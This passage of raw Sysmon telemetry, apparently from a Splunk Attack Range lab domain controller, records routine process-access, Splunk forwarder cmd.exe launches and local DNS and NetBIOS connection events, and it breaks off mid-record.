12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.283{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.288{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.177{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.730{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local55208- 354300x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.730{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64404- 354300x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local56179- 354300x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54715- 354300x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local55056- 354300x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local59569- 354300x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.720{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-892.attackrange.local138netbios-dgm 354300x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.720{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 
354300x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.719{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55208- 354300x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.717{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64404- 354300x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59569- 354300x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55056- 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KE